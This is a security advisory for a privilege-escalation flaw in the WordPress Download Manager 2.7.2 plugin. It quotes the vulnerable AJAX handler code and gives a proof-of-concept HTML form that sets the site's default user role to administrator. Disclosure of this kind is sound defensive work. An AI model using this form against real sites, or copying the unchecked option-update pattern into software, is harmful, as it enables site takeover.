WordPress Download Manager 2.7.2 Privilege Escalation

Homepage:

https://wordpress.org/plugins/download-manager/

CVE-ID

CVE-2014-9260

CVSS Score

5.5

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:P/A:N)

Description:

wdm_ajax_settings() is accessible to every registered user.

File: download-manager\hooks.php

if (is_admin()) {
    add_action('admin_enqueue_scripts', 'wpdm_admin_enqueue_scripts');
    add_action("admin_menu", "fmmenu");
    add_action('wp_ajax_wdm_settings', 'wdm_ajax_settings');
}

Using wdm_ajax_settings() we can execute basic_settings().

File: download-manager\wpdm-core.php

$stabs['basic'] = array('id' => 'basic', 'link' => 'edit.php?post_type=wpdmpro&page=settings', 'title' => 'Basic', 'callback' => 'basic_settings');
function wdm_ajax_settings()
{
    global $stabs;
    call_user_func($stabs[$_POST['section']]['callback']);
    die();
}

Using basic_settings() we can update every WordPress options, for example: default_role or blogname.

File: download-manager\wpdm-core.php

function basic_settings()
{
    if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') {

        foreach ($_POST as $optn => $optv) {
            update_option($optn, $optv);
        }
        if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form');



        die('Settings Saved Successfully');
    }
    include('settings/basic.php');
}

Proof of Concept:

Login as standard user (created using wp-login.php?action=register) then:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings">
    <input type="hidden" name="task" value="wdm_save_settings">
    <input type="hidden" name="section" value="basic">
    <input type="hidden" name="default_role" value="administrator">
    <input type="submit" value="Hack!">
</form>

After that create new user using wp-login.php?action=register. Newly created user will have admin privileges.

Timeline: